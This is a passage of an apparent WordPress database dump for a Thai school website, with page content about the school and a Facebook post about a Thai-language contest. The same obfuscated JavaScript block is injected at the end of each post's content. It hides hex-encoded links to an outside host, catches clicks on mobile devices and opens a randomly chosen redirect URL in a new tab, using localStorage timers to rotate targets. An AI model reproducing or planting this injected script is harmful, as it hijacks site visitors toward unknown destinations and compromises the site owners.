kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"73adeab7\",\"blockVersion\":4,\"display\":\"block\",\"typography\":{\"textAlign\":\"center\",\"fontSize\":\"20px\"},\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"20px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"20px\",\"marginBottom\":\"10px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#0693e3\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-73adeab7 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 10:58:26','2024-07-27 03:58:26','',14,'http://pakhaeng.ssk.in.th/?p=62',0,'revision','',0),
(63,1,'2024-07-27 11:00:21','2024-07-27 04:00:21','<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%2Fposts%2Fpfbid04bfLebPyeptUAV338gFDfXqEZ9GJd9sEpJjGWeJWK5GSdaeXc4XmZ5VQShuasdNGl&show_text=true&width=500\" width=\"500\" height=\"741\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','กลุ่มเครือข่ายคุณภาพการศึกษา CEO ประจิมโนนคูณ ได้จัดกิจกรรมแข่งขันทักษะภาษาไทย ตามโครงการรักษ์ภาษาไทย 